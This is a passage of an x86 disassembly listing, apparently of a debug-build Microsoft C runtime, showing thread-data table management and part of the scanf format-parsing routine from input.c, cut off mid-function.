loc_41F843: ; CODE XREF: sub_41F840:loc_41F871�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
sub ecx, 1
mov [ebp+arg_4], ecx
test eax, eax
jle short loc_41F873
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41F7C0
add esp, 0Ch
mov edx, [ebp+arg_C]
cmp dword ptr [edx], 0FFFFFFFFh
jnz short loc_41F871
jmp short loc_41F873
; ---------------------------------------------------------------------------
loc_41F871: ; CODE XREF: sub_41F840+2D�j
jmp short loc_41F843
; ---------------------------------------------------------------------------
loc_41F873: ; CODE XREF: sub_41F840+11�j
; sub_41F840+2F�j
pop ebp
retn
sub_41F840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F880 proc near ; CODE XREF: sub_41EA90+AEB�p
; sub_41EA90+BC2�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
loc_41F884: ; CODE XREF: sub_41F880:loc_41F8C4�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
sub ecx, 1
mov [ebp+arg_4], ecx
test eax, eax
jle short loc_41F8C6
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
call sub_41F7C0
add esp, 0Ch
mov edx, [ebp+arg_C]
cmp dword ptr [edx], 0FFFFFFFFh
jnz short loc_41F8C4
jmp short loc_41F8C6
; ---------------------------------------------------------------------------
loc_41F8C4: ; CODE XREF: sub_41F880+40�j
jmp short loc_41F884
; ---------------------------------------------------------------------------
loc_41F8C6: ; CODE XREF: sub_41F880+12�j
; sub_41F880+42�j
mov esp, ebp
pop ebp
retn
sub_41F880 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F8D0 proc near ; CODE XREF: sub_41EA90+218�p
; sub_41EA90+27F�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 4
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
mov eax, [ecx-4]
pop ebp
retn
sub_41F8D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F8F0 proc near ; CODE XREF: sub_41EA90+7D5�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 8
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
sub ecx, 8
mov eax, [ecx]
mov edx, [ecx+4]
pop ebp
retn
sub_41F8F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F910 proc near ; CODE XREF: sub_41EA90+3B2�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 4
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
mov ax, [ecx-4]
pop ebp
retn
sub_41F910 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F930 proc near ; CODE XREF: sub_41B970:loc_41BA04�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_41BBB0
call ds:dword_494460
mov dword_442F6C, eax
cmp dword_442F6C, 0FFFFFFFFh
jnz short loc_41F951
xor eax, eax
jmp short loc_41F9AE
; ---------------------------------------------------------------------------
loc_41F951: ; CODE XREF: sub_41F930+1B�j
push 61h
push offset aTidtable_c ; "tidtable.c"
push 2
push 74h
push 1
call sub_416E40
add esp, 14h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41F984
mov eax, [ebp+var_4]
push eax
mov ecx, dword_442F6C
push ecx
call ds:dword_49445C
test eax, eax
jnz short loc_41F988
loc_41F984: ; CODE XREF: sub_41F930+3D�j
xor eax, eax
jmp short loc_41F9AE
; ---------------------------------------------------------------------------
loc_41F988: ; CODE XREF: sub_41F930+52�j
mov edx, [ebp+var_4]
push edx
call sub_41F9F0
add esp, 4
call ds:dword_494458
mov ecx, [ebp+var_4]
mov [ecx], eax
mov edx, [ebp+var_4]
mov dword ptr [edx+4], 0FFFFFFFFh
mov eax, 1
loc_41F9AE: ; CODE XREF: sub_41F930+1F�j
; sub_41F930+56�j
mov esp, ebp
pop ebp
retn
sub_41F930 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
call sub_41BBF0
cmp dword_442F6C, 0FFFFFFFFh
jz short loc_41F9E7
mov eax, dword_442F6C
push eax
call ds:dword_494464
mov dword_442F6C, 0FFFFFFFFh
loc_41F9E7: ; CODE XREF: .text:0041F9CF�j
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F9F0 proc near ; CODE XREF: sub_41F930+5C�p
; sub_41FA10+5E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov dword ptr [eax+50h], offset dword_4435D0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+14h], 1
pop ebp
retn
sub_41F9F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FA10 proc near ; CODE XREF: sub_418FF0+3�p
; sub_419000+4�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
call ds:dword_4942F0
mov [ebp+var_8], eax
mov eax, dword_442F6C
push eax
call ds:dword_49446C
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41FA97
push 0E7h
push offset aTidtable_c ; "tidtable.c"
push 2
push 74h
push 1
call sub_416E40
add esp, 14h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41FA8D
mov ecx, [ebp+var_4]
push ecx
mov edx, dword_442F6C
push edx
call ds:dword_49445C
test eax, eax
jz short loc_41FA8D
mov eax, [ebp+var_4]
push eax
call sub_41F9F0
add esp, 4
call ds:dword_494458
mov ecx, [ebp+var_4]
mov [ecx], eax
mov edx, [ebp+var_4]
mov dword ptr [edx+4], 0FFFFFFFFh
jmp short loc_41FA97
; ---------------------------------------------------------------------------
loc_41FA8D: ; CODE XREF: sub_41FA10+43�j
; sub_41FA10+58�j
push 10h
call sub_41BAE0
add esp, 4
loc_41FA97: ; CODE XREF: sub_41FA10+22�j
; sub_41FA10+7B�j
mov eax, [ebp+var_8]
push eax
call ds:dword_494468
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_41FA10 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
cmp dword_442F6C, 0FFFFFFFFh
jz loc_41FBB5
cmp dword ptr [ebp+8], 0
jnz short loc_41FAD5
mov eax, dword_442F6C
push eax
call ds:dword_49446C
mov [ebp+8], eax
loc_41FAD5: ; CODE XREF: .text:0041FAC4�j
cmp dword ptr [ebp+8], 0
jz loc_41FBA6
mov ecx, [ebp+8]
cmp dword ptr [ecx+24h], 0
jz short loc_41FAF9
push 2
mov edx, [ebp+8]
mov eax, [edx+24h]
push eax
call sub_4174C0
add esp, 8
loc_41FAF9: ; CODE XREF: .text:0041FAE6�j
mov ecx, [ebp+8]
cmp dword ptr [ecx+28h], 0
jz short loc_41FB13
push 2
mov edx, [ebp+8]
mov eax, [edx+28h]
push eax
call sub_4174C0
add esp, 8
loc_41FB13: ; CODE XREF: .text:0041FB00�j
mov ecx, [ebp+8]
cmp dword ptr [ecx+30h], 0
jz short loc_41FB2D
push 2
mov edx, [ebp+8]
mov eax, [edx+30h]
push eax
call sub_4174C0
add esp, 8
loc_41FB2D: ; CODE XREF: .text:0041FB1A�j
mov ecx, [ebp+8]
cmp dword ptr [ecx+38h], 0
jz short loc_41FB47
push 2
mov edx, [ebp+8]
mov eax, [edx+38h]
push eax
call sub_4174C0
add esp, 8
loc_41FB47: ; CODE XREF: .text:0041FB34�j
mov ecx, [ebp+8]
cmp dword ptr [ecx+40h], 0
jz short loc_41FB61
push 2
mov edx, [ebp+8]
mov eax, [edx+40h]
push eax
call sub_4174C0
add esp, 8
loc_41FB61: ; CODE XREF: .text:0041FB4E�j
mov ecx, [ebp+8]
cmp dword ptr [ecx+44h], 0
jz short loc_41FB7B
push 2
mov edx, [ebp+8]
mov eax, [edx+44h]
push eax
call sub_4174C0
add esp, 8
loc_41FB7B: ; CODE XREF: .text:0041FB68�j
mov ecx, [ebp+8]
cmp dword ptr [ecx+50h], offset dword_4435D0
jz short loc_41FB98
push 2
mov edx, [ebp+8]
mov eax, [edx+50h]
push eax
call sub_4174C0
add esp, 8
loc_41FB98: ; CODE XREF: .text:0041FB85�j
push 2
mov ecx, [ebp+8]
push ecx
call sub_4174C0
add esp, 8
loc_41FBA6: ; CODE XREF: .text:0041FAD9�j
push 0
mov edx, dword_442F6C
push edx
call ds:dword_49445C
loc_41FBB5: ; CODE XREF: .text:0041FABA�j
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
call ds:dword_494458
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
call ds:dword_494470
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FBE0 proc near ; CODE XREF: sub_4192A0+A2�p
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = dword ptr -200h
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1F4 = dword ptr -1F4h
var_1F0 = byte ptr -1F0h
var_1EF = byte ptr -1EFh
var_1EC = dword ptr -1ECh
var_1E8 = dword ptr -1E8h
var_1E4 = dword ptr -1E4h
var_1E0 = dword ptr -1E0h
var_1DC = dword ptr -1DCh
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = byte ptr -1D0h
var_70 = byte ptr -70h
var_6C = dword ptr -6Ch
var_68 = byte ptr -68h
var_64 = byte ptr -64h
var_60 = byte ptr -60h
var_55 = byte ptr -55h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 224h
push ebx
push esi
push edi
loc_41FBEC: ; CODE XREF: sub_41FBE0+37�j
cmp [ebp+arg_4], 0
jnz short loc_41FC13
push offset aFormatNull ; "format != NULL"
push 0
push 109h
push offset aInput_c ; "input.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41FC13
int 3 ; Trap to Debugger
loc_41FC13: ; CODE XREF: sub_41FBE0+10�j
; sub_41FBE0+30�j
xor eax, eax
test eax, eax
jnz short loc_41FBEC
loc_41FC19: ; CODE XREF: sub_41FBE0+64�j
cmp [ebp+arg_0], 0
jnz short loc_41FC40
push offset aStreamNull ; "stream != NULL"
push 0
push 10Ch
push offset aInput_c ; "input.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41FC40
int 3 ; Trap to Debugger
loc_41FC40: ; CODE XREF: sub_41FBE0+3D�j
; sub_41FBE0+5D�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41FC19
mov [ebp+var_28], 0
movsx edx, [ebp+var_28]
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
mov [ebp+var_34], eax
loc_41FC57: ; CODE XREF: sub_41FBE0:loc_420EC5�j
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
test edx, edx
jz loc_420ECA
cmp dword_442F58, 1
jle short loc_41FC89
push 8
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax]
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_1F8], eax
jmp short loc_41FCA5
; ---------------------------------------------------------------------------
loc_41FC89: ; CODE XREF: sub_41FBE0+8D�j
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8
mov [ebp+var_1F8], edx
loc_41FCA5: ; CODE XREF: sub_41FBE0+A7�j
cmp [ebp+var_1F8], 0
jz short loc_41FCF3
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_0]
push edx
lea eax, [ebp+var_20]
push eax
call sub_4210A0
add esp, 8
push eax
call sub_421080
add esp, 8
loc_41FCD4: ; CODE XREF: sub_41FBE0+111�j
mov ecx, [ebp+arg_4]
add ecx, 1
mov [ebp+arg_4], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
push eax
call sub_427670
add esp, 4
test eax, eax
jz short loc_41FCF3
jmp short loc_41FCD4
; ---------------------------------------------------------------------------
loc_41FCF3: ; CODE XREF: sub_41FBE0+CC�j
; sub_41FBE0+10F�j
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
cmp edx, 25h
jnz loc_420DAE
mov [ebp+var_40], 0
mov byte ptr [ebp+var_8], 0
mov [ebp+var_6C], 0
mov eax, [ebp+var_6C]
mov [ebp+var_1E8], eax
mov ecx, [ebp+var_1E8]
mov [ebp+var_1C], ecx
mov [ebp+var_10], 0
mov dl, [ebp+var_10]
mov [ebp+var_68], dl
mov al, [ebp+var_68]
mov [ebp+var_70], al
mov cl, [ebp+var_70]
mov [ebp+var_18], cl
mov dl, [ebp+var_18]
mov [ebp+var_64], dl
mov [ebp+var_14], 0
mov [ebp+var_38], 1
mov [ebp+var_1DC], 0
loc_41FD55: ; CODE XREF: sub_41FBE0:loc_41FEAD�j
movsx eax, [ebp+var_18]
test eax, eax
jnz loc_41FEB2
mov ecx, [ebp+arg_4]
add ecx, 1
mov [ebp+arg_4], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
mov [ebp+var_C], eax
cmp dword_442F58, 1
jle short loc_41FD99
push 4
mov ecx, [ebp+var_C]
and ecx, 0FFh
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_1FC], eax
jmp short loc_41FDB6
; ---------------------------------------------------------------------------
loc_41FD99: ; CODE XREF: sub_41FBE0+19B�j
mov edx, [ebp+var_C]
and edx, 0FFh
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_1FC], ecx
loc_41FDB6: ; CODE XREF: sub_41FBE0+1B7�j
cmp [ebp+var_1FC], 0
jz short loc_41FDE6
mov edx, [ebp+var_1E8]
add edx, 1
mov [ebp+var_1E8], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
lea edx, [ecx+eax*4]
mov eax, [ebp+var_C]
lea ecx, [eax+edx*2-30h]
mov [ebp+var_1C], ecx
jmp loc_41FEAD
; ---------------------------------------------------------------------------
loc_41FDE6: ; CODE XREF: sub_41FBE0+1DD�j
mov edx, [ebp+var_C]
mov [ebp+var_200], edx
mov eax, [ebp+var_200]
sub eax, 2Ah
mov [ebp+var_200], eax
cmp [ebp+var_200], 4Dh
ja loc_41FEA5
mov edx, [ebp+var_200]
xor ecx, ecx
mov cl, ds:byte_420F28[edx]
jmp ds:off_420F08[ecx*4]
loc_41FE20: ; DATA XREF: .text:00420F0C�o
jmp loc_41FEAD
; ---------------------------------------------------------------------------
loc_41FE25: ; CODE XREF: sub_41FBE0+239�j
; DATA XREF: .text:00420F18�o
mov al, [ebp+var_38]
sub al, 1
mov [ebp+var_38], al
mov cl, [ebp+var_14]
sub cl, 1
mov [ebp+var_14], cl
jmp short loc_41FEAD
; ---------------------------------------------------------------------------
loc_41FE38: ; CODE XREF: sub_41FBE0+239�j
; DATA XREF: .text:00420F10�o
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx+1]
cmp eax, 36h
jnz short loc_41FE7A
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx+2]
cmp edx, 34h
jnz short loc_41FE7A
mov eax, [ebp+arg_4]
add eax, 2
mov [ebp+arg_4], eax
mov ecx, [ebp+var_1DC]
add ecx, 1
mov [ebp+var_1DC], ecx
mov [ebp+var_30], 0
mov [ebp+var_2C], 0
jmp short loc_41FEAD
; ---------------------------------------------------------------------------
loc_41FE7A: ; CODE XREF: sub_41FBE0+263�j
; sub_41FBE0+270�j
jmp short loc_41FEA5
; ---------------------------------------------------------------------------
loc_41FE7C: ; CODE XREF: sub_41FBE0+239�j
; DATA XREF: .text:00420F14�o
mov dl, [ebp+var_38]
add dl, 1
mov [ebp+var_38], dl
jmp short loc_41FEAD
; ---------------------------------------------------------------------------
loc_41FE87: ; CODE XREF: sub_41FBE0+239�j
; DATA XREF: .text:00420F1C�o
mov al, [ebp+var_38]
add al, 1
mov [ebp+var_38], al
loc_41FE8F: ; CODE XREF: sub_41FBE0+239�j
; DATA XREF: .text:00420F20�o
mov cl, [ebp+var_14]
add cl, 1
mov [ebp+var_14], cl
jmp short loc_41FEAD
; ---------------------------------------------------------------------------
loc_41FE9A: ; CODE XREF: sub_41FBE0+239�j
; DATA XREF: .text:off_420F08�o
mov dl, [ebp+var_70]
add dl, 1
mov [ebp+var_70], dl
jmp short loc_41FEAD
; ---------------------------------------------------------------------------
loc_41FEA5: ; CODE XREF: sub_41FBE0+225�j
; sub_41FBE0+239�j ...
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
loc_41FEAD: ; CODE XREF: sub_41FBE0+201�j
; sub_41FBE0:loc_41FE20�j ...
jmp loc_41FD55
; ---------------------------------------------------------------------------
loc_41FEB2: ; CODE XREF: sub_41FBE0+17B�j
movsx ecx, [ebp+var_70]
test ecx, ecx
jnz short loc_41FED5
mov edx, [ebp+arg_8]
mov [ebp+var_1D4], edx
mov eax, [ebp+arg_8]
add eax, 4
mov [ebp+arg_8], eax
mov ecx, [ebp+arg_8]
mov edx, [ecx-4]
mov [ebp+var_3C], edx
loc_41FED5: ; CODE XREF: sub_41FBE0+2D8�j
mov [ebp+var_18], 0
movsx eax, [ebp+var_14]
test eax, eax
jnz short loc_41FF0C
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
cmp edx, 53h
jz short loc_41FEF9
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax]
cmp ecx, 43h
jnz short loc_41FF04
loc_41FEF9: ; CODE XREF: sub_41FBE0+30B�j
mov dl, [ebp+var_14]
add dl, 1
mov [ebp+var_14], dl
jmp short loc_41FF0C
; ---------------------------------------------------------------------------
loc_41FF04: ; CODE XREF: sub_41FBE0+317�j
mov al, [ebp+var_14]
sub al, 1
mov [ebp+var_14], al
loc_41FF0C: ; CODE XREF: sub_41FBE0+2FF�j
; sub_41FBE0+322�j
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
or edx, 20h
mov [ebp+var_C], edx
cmp [ebp+var_C], 6Eh
jz short loc_41FF5E
cmp [ebp+var_C], 63h
jz short loc_41FF43
cmp [ebp+var_C], 7Bh
jz short loc_41FF43
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_20]
push ecx
call sub_4210A0
add esp, 8
mov [ebp+var_1D8], eax
jmp short loc_41FF5E
; ---------------------------------------------------------------------------
loc_41FF43: ; CODE XREF: sub_41FBE0+343�j
; sub_41FBE0+349�j
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
loc_41FF5E: ; CODE XREF: sub_41FBE0+33D�j
; sub_41FBE0+361�j
cmp [ebp+var_1E8], 0
jz short loc_41FF71
cmp [ebp+var_1C], 0
jz loc_420D7F
loc_41FF71: ; CODE XREF: sub_41FBE0+385�j
mov ecx, [ebp+var_C]
mov [ebp+var_204], ecx
mov edx, [ebp+var_204]
sub edx, 63h
mov [ebp+var_204], edx
cmp [ebp+var_204], 18h
ja loc_420D2A
mov ecx, [ebp+var_204]
xor eax, eax
mov al, ds:byte_420F9E[ecx]
jmp ds:off_420F76[eax*4]
loc_41FFAB: ; DATA XREF: .text:off_420F76�o
cmp [ebp+var_1E8], 0
jnz short loc_41FFCC
mov edx, [ebp+var_1E8]
add edx, 1
mov [ebp+var_1E8], edx
mov eax, [ebp+var_1C]
add eax, 1
mov [ebp+var_1C], eax
loc_41FFCC: ; CODE XREF: sub_41FBE0+3D2�j
movsx ecx, [ebp+var_14]
test ecx, ecx
jle short loc_41FFDD
mov dl, [ebp+var_64]
add dl, 1
mov [ebp+var_64], dl
loc_41FFDD: ; CODE XREF: sub_41FBE0+3F2�j
mov [ebp+var_1E0], offset asc_442F78 ; "]"
mov al, [ebp+var_10]
sub al, 1
mov [ebp+var_10], al
jmp short loc_420060
; ---------------------------------------------------------------------------
loc_41FFF1: ; CODE XREF: sub_41FBE0+3C4�j
; DATA XREF: .text:00420F8E�o
movsx ecx, [ebp+var_14]
test ecx, ecx
jle short loc_420002
mov dl, [ebp+var_64]
add dl, 1
mov [ebp+var_64], dl
loc_420002: ; CODE XREF: sub_41FBE0+417�j
mov [ebp+var_1E0], offset asc_442F70 ; " \t-\r]"
mov al, [ebp+var_10]
sub al, 1
mov [ebp+var_10], al
jmp short loc_420060
; ---------------------------------------------------------------------------
loc_420016: ; CODE XREF: sub_41FBE0+3C4�j
; DATA XREF: .text:00420F96�o
movsx ecx, [ebp+var_14]
test ecx, ecx
jle short loc_420027
mov dl, [ebp+var_64]
add dl, 1
mov [ebp+var_64], dl
loc_420027: ; CODE XREF: sub_41FBE0+43C�j
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
mov [ebp+var_1E0], ecx
mov edx, [ebp+var_1E0]
xor eax, eax
mov al, [edx]
cmp eax, 5Eh
jnz short loc_420060
mov ecx, [ebp+var_1E0]
add ecx, 1
mov [ebp+var_1E0], ecx
mov dl, [ebp+var_10]
sub dl, 1
mov [ebp+var_10], dl
loc_420060: ; CODE XREF: sub_41FBE0+40F�j
; sub_41FBE0+434�j ...
push 20h
push 0
lea eax, [ebp+var_60]
push eax
call sub_4189A0
add esp, 0Ch
cmp [ebp+var_C], 7Bh
jnz short loc_42009C
mov ecx, [ebp+var_1E0]
xor edx, edx
mov dl, [ecx]
cmp edx, 5Dh
jnz short loc_42009C
mov byte ptr [ebp+var_8], 5Dh
mov eax, [ebp+var_1E0]
add eax, 1
mov [ebp+var_1E0], eax
mov [ebp+var_55], 20h
loc_42009C: ; CODE XREF: sub_41FBE0+494�j
; sub_41FBE0+4A3�j ...
mov ecx, [ebp+var_1E0]
xor edx, edx
mov dl, [ecx]
cmp edx, 5Dh
jz loc_420207
mov eax, [ebp+var_1E0]
mov cl, [eax]
mov byte ptr [ebp+var_1EC], cl
mov edx, [ebp+var_1E0]
add edx, 1
mov [ebp+var_1E0], edx
mov eax, [ebp+var_1EC]
and eax, 0FFh
cmp eax, 2Dh
jnz short loc_4200F8
mov ecx, [ebp+var_8]
and ecx, 0FFh
test ecx, ecx
jz short loc_4200F8
mov edx, [ebp+var_1E0]
xor eax, eax
mov al, [edx]
cmp eax, 5Dh
jnz short loc_42013E
loc_4200F8: ; CODE XREF: sub_41FBE0+4FA�j
; sub_41FBE0+507�j
mov cl, byte ptr [ebp+var_1EC]
mov byte ptr [ebp+var_8], cl
mov edx, [ebp+var_8]
and edx, 0FFh
sar edx, 3
mov ecx, [ebp+var_1EC]
and ecx, 0FFh
and ecx, 7
mov eax, 1
shl eax, cl
mov cl, [ebp+edx+var_60]
or cl, al
mov edx, [ebp+var_8]
and edx, 0FFh
sar edx, 3
mov [ebp+edx+var_60], cl
jmp loc_420202
; ---------------------------------------------------------------------------
loc_42013E: ; CODE XREF: sub_41FBE0+516�j
mov eax, [ebp+var_1E0]
mov cl, [eax]
mov byte ptr [ebp+var_1EC], cl
mov edx, [ebp+var_1E0]
add edx, 1
mov [ebp+var_1E0], edx
mov eax, [ebp+var_8]
and eax, 0FFh
mov ecx, [ebp+var_1EC]
and ecx, 0FFh
cmp eax, ecx
jge short loc_42017E
mov dl, byte ptr [ebp+var_1EC]
mov byte ptr [ebp+var_24], dl
jmp short loc_42018D
; ---------------------------------------------------------------------------
loc_42017E: ; CODE XREF: sub_41FBE0+591�j
mov al, byte ptr [ebp+var_8]
mov byte ptr [ebp+var_24], al
mov cl, byte ptr [ebp+var_1EC]
mov byte ptr [ebp+var_8], cl
loc_42018D: ; CODE XREF: sub_41FBE0+59C�j
mov dl, byte ptr [ebp+var_8]
mov byte ptr [ebp+var_1EC], dl
jmp short loc_4201A6
; ---------------------------------------------------------------------------
loc_420198: ; CODE XREF: sub_41FBE0+61C�j
mov al, byte ptr [ebp+var_1EC]
add al, 1
mov byte ptr [ebp+var_1EC], al
loc_4201A6: ; CODE XREF: sub_41FBE0+5B6�j
mov ecx, [ebp+var_1EC]
and ecx, 0FFh
mov edx, [ebp+var_24]
and edx, 0FFh
cmp ecx, edx
jg short loc_4201FE
mov eax, [ebp+var_1EC]
and eax, 0FFh
sar eax, 3
mov ecx, [ebp+var_1EC]
and ecx, 0FFh
and ecx, 7
mov edx, 1
shl edx, cl
mov al, [ebp+eax+var_60]
or al, dl
mov ecx, [ebp+var_1EC]
and ecx, 0FFh
sar ecx, 3
mov [ebp+ecx+var_60], al
jmp short loc_420198
; ---------------------------------------------------------------------------
loc_4201FE: ; CODE XREF: sub_41FBE0+5DD�j
mov byte ptr [ebp+var_8], 0
loc_420202: ; CODE XREF: sub_41FBE0+559�j
jmp loc_42009C
; ---------------------------------------------------------------------------
loc_420207: ; CODE XREF: sub_41FBE0+4C9�j
mov edx, [ebp+var_1E0]
xor eax, eax
mov al, [edx]
test eax, eax
jnz short loc_42021A
jmp loc_420ECA
; ---------------------------------------------------------------------------
loc_42021A: ; CODE XREF: sub_41FBE0+633�j
cmp [ebp+var_C], 7Bh
jnz short loc_420229
mov ecx, [ebp+var_1E0]
mov [ebp+arg_4], ecx
loc_420229: ; CODE XREF: sub_41FBE0+63E�j
mov edx, [ebp+var_3C]
mov [ebp+var_1E4], edx
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_1D8]
push edx
call sub_421080
add esp, 8
loc_42024E: ; CODE XREF: sub_41FBE0:loc_420390�j
cmp [ebp+var_1E8], 0
jz short loc_42026B
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
test eax, eax
jz loc_420395
loc_42026B: ; CODE XREF: sub_41FBE0+675�j
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_421020
add esp, 4
mov [ebp+var_1D8], eax
cmp [ebp+var_1D8], 0FFFFFFFFh
jz loc_420372
mov ecx, [ebp+var_1D8]
sar ecx, 3
movsx edx, [ebp+ecx+var_60]
movsx eax, [ebp+var_10]
xor edx, eax
mov ecx, [ebp+var_1D8]
and ecx, 7
mov eax, 1
shl eax, cl
and edx, eax
test edx, edx
jz loc_420372
movsx ecx, [ebp+var_70]
test ecx, ecx
jnz loc_420361
movsx edx, [ebp+var_64]
test edx, edx
jz short loc_42034B
mov al, byte ptr [ebp+var_1D8]
mov [ebp+var_1F0], al
mov ecx, [ebp+var_1D8]
and ecx, 0FFh
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 8000h
test eax, eax
jz short loc_42031D
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
call sub_421020
add esp, 4
mov [ebp+var_1EF], al
loc_42031D: ; CODE XREF: sub_41FBE0+720�j
mov eax, dword_442F58
push eax
lea ecx, [ebp+var_1F0]
push ecx
lea edx, [ebp+var_4]
push edx
call sub_427330
add esp, 0Ch
mov eax, [ebp+var_3C]
mov cx, [ebp+var_4]
mov [eax], cx
mov edx, [ebp+var_3C]
add edx, 2
mov [ebp+var_3C], edx
jmp short loc_42035F
; ---------------------------------------------------------------------------
loc_42034B: ; CODE XREF: sub_41FBE0+6F3�j
mov eax, [ebp+var_3C]
mov cl, byte ptr [ebp+var_1D8]
mov [eax], cl
mov edx, [ebp+var_3C]
add edx, 1
mov [ebp+var_3C], edx
loc_42035F: ; CODE XREF: sub_41FBE0+769�j
jmp short loc_420370
; ---------------------------------------------------------------------------
loc_420361: ; CODE XREF: sub_41FBE0+6E7�j
mov eax, [ebp+var_1E4]
add eax, 1
mov [ebp+var_1E4], eax
